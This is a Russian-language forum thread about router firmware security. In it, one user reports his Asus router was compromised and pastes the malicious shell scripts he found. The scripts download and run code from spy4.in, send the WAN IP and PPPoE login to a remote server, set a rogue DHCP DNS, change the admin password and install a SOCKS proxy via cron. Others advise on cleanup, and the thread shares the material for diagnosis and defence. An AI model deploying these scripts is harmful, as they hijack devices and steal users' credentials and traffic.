В прошивках Олеги и Энтузиастов WPS нет как класса, соответственно, ломать нечего.
Поскольку обсуждать нечего - перенёс сюда.
Printable View
ААА можно немножко пофлудить?:cool: Раз уж подняли тут эту тему, то - Подбор паролей к WPA/WPA2 с использованием видеокарты http://habrahabr.ru/post/122553/ - естественно работает вне зависимости от того какая прошивка установленна на роутере) Используется как обсчет на видеокарте так и сокращение необходимого диапазона просчета с использованием "как это по русски" - радужных таблиц )
Деклаймер - Естественно применяется только для нахождения забытого пароля к своей точке )
коллеги, каюсь, помнил, но забыл.
как посмотреть/поменять пароль рута из веб-морды?
спасибо.
В связи найденной уязвимостью в wps, хочу узнать, работает ли он в прошивке "от олега". В оригинальной прошивке вроде есть и можно отключать.
Роутер asus wl500gpv2.
топикстартер этого не увидел и всё еще волнуется :)
Тогда и я добавлю: взлом WPS.
Сюда же: "Уголовный кодекс РФ (УК РФ). Статья 272. Неправомерный доступ к компьютерной информации."
Как поменять из веб-морды? "System Setup" —> "Change Password"
Из консоли посмотреть:
nvram show | grep http_passwd
Имею wl500gpv2 уже 3 года. Изучил полностью. Недавно перепрошил на последнюю прошивку от энтузиастов.
были некоторые проблемы с samba (нет доступа с ipad из программы buzz player). поэтому отключил iptables (iptables -P FORWARD ACCEPT
iptables -P INPUT ACCEPT).
так и оставил. сегодня нужно было изменить некоторые скрипты. обратил внимание, что в /tmp/local/sbin много файлов. прибил лишние процессы и начал смотреть...
содержимое post-firewall:
добавился файл tocron:Code:#!/bin/sh
cd /usr/local/sbin
wget -q http://spy4.in/data/tofire
chmod +x tofire
sh tofire
rm -rf tofire
исполняемые 3proxy, proxy, udppm, socks и еще паруCode:#!/bin/sh
cd /usr/local/sbin && wget -q http://spy4.in/data/todo && chmod +x todo && ./todo && rm -rf todo
содержимое http://spy4.in/data/todo:
содержимое http://spy4.in/data/tofire:Code:#!/bin/sh
rip=`nvram get wan0_ipaddr`
ilogin=`nvram get wan0_pppoe_username`
sport=`cat /usr/local/etc/sport`
sleep ` tr -cd 1-9 </dev/urandom | head -c 2`s
wget -q -O ttt http://spy4.in/g.php?rname=$ilogin\&rip=$rip\&sport=$sport
rm -rf ttt
особо ничего не вытянет (ip внутренний, iptables уже вкрутил, пароль поменял).Code:#!/bin/sh
nvram set dhcp_dns1_x=217.12.219.20
nvram set http_passwd=qweasdOP
mount -obind /tmp/local /opt
cd /tmp/ && wget http://spy4.in/data/3.tgz && tar xvzf 3.tgz
rm -rf /tmp/3.tgz
mkdir /var/spool/cron/crontabs/ -p
mv -f /tmp/local/admin /var/spool/cron/crontabs/
chmod +x /var/spool/cron/crontabs/admin
killall crond
sleep 3
crond
crontab /var/spool/cron/crontabs/admin -u admin
SPORT=` tr -cd 1-5 </dev/urandom | head -c 5`
echo $SPORT > /usr/local/etc/sport
echo "daemon
nserver 8.8.8.8
auth none
socks -p$SPORT" > /usr/local/etc/3proxy.cfg
killall 3proxy
sleep 5
3proxy /usr/local/etc/3proxy.cfg
cd /usr/local/sbin && ./tocron
Кто нибудь сталкивался с подобным? чем грозит как думаете? где еще чего посмотреть?
upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражения подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)
А о чем, по-Вашему, эта тема?!
А чем может грозить захваченный роутер? Съесть Ваш трафик, "засветить" IP на сайтах противоправной направленности (экстремистских, распространяющих детское порно, и т. д.) и привлечь к этому IP внимание правоохранительных органов, перехватывать ваш трафик, в том числе пароли и куки, и использовать их для распространения спама... Продолжать?
А что, в роутере дофига мест, "где посмотреть"?
Ставьте новую прошивку, делайте сброс в заводские установки, удаляёте всё с носителей и из flashfs. И не отключайте бездумно фаервол!
ММММ...
Да наверное все что хотели то и делали. Суди по скриптам самое интересное в файлике что скачивался. Хочешь узнать где наследил скачай его и посмотри в нутрь.
А так от ДОС атак до банального перехвата паролей к сайтам, вебмани, киви, почты, и т.д. если дома клиент банк то ты ввобще победитель=)
Присоеденяюсь к словам : "Все в дефолт"
А самое главное не оставлять пароль админа штатным, думаю при том что ты отключил фаирвол открыл телнет сдоступом по wan.
надеюсь дефолтный пароль меняли? ибо досихпор бродит по сети вирусняк для роутеров... признаки: тормозит ребутится .... в процессах дофига висит с именем mips
Кстати, пароль не менял. Надо будет попробовать. Хотя процессов mips не обнаружено.
Еще вычитал, что бывают проблемы с подключением гигабитных устройств.
Будет чем завтра на работе заняться.
Попробовать заменить БП, попробовать отключить все от сети, и если ничего не поможет, то восстановление с помощью перепрошивки и смена пароля
Заменил БП на другой - лучше не стало
Отключил от роутера все, кроме одной 100Мб сети, по прежнему перезагружается.
Может есть еще варианты, что можно посмотреть?
Критические уязвимости в беспроводных маршрутизаторах Cisco Linksys
http://www.youtube.com/watch?feature...&v=cv-MbL7KFKEQuote:
Исследователи безопасности предупредили (http://seclists.org/fulldisclosure/2013/Jan/69) о скорой публикации в открытом доступе
информации о критической уязвимости в беспроводных маршрутизаторах Cisco Linksys. Уязвимость позволяет из внешней сети получить
доступ к устройству под пользователем root без проведения аутентификации. Компания Cisco была уведомлена о проблеме несколько
месяцев назад, но исправление так и не было выпущено. В настоящее время все доступные версии прошивки Linksys уязвимы, что ставит
под удар около 70 млн находящихся в сети устройств. Выявившие уязвимость исследователи не намерены больше скрывать информацию
от общественности и планируют дать компании Cisco ещё две недели на подготовку обновления прошивки, после чего опубликовать
детали уязвимости и концептуальный прототип эксплоита.
http://www.opennet.ru/openforum/vslu...ID3/88202.html :rolleyes:Quote:
>> Похоже, альтернативы dd-wrt особо-то и нет.
> zRouter на базе FreeBSD ( http://zrouter.org/ )
> openWRT
> RouterOS
> Gargoyle
wive-ng ( более оптимизированный на потребление ресурсов озу и цпу, в отличии от dd-wrt ) = http://sourceforge.net/projects/wive-ng/
> wive-ng ( более оптимизированный на потребление ресурсов озу и цпу )
А что, она уже поддерживает девайсы на броадкоме? oO
> zRouter на базе FreeBSD ( http://zrouter.org/ )
Это для желающих с роутером мучаться, а не пользоваться оным.
> openWRT
А там недопиленo и требует шаманства руками, как то сборка из транка и патчинг. Вариант, но не для средних умов.
> RouterOS
Огороженная и закрытая хрень. Теоретически сорц получить можно. Практически, проще сразу застрелиться, чем иметь дело с этими господами.
> Gargoyle
Довольно странная прошивка "на любителя".
> томато от шибби
Что такое tomato я уже примерно знаю, а что такое шибби?
> Что такое tomato я уже примерно знаю, а что такое шибби?
Вы ещё спросите, кто такой Олег :)
В прошивке присутствует libupnp с обнаруженной уязвимостью http://seclists.org/bugtraq/2013/Jan/130 ?
Где-то читал, что даже с внешнего интерфейса UPnP уязвим. Это правда?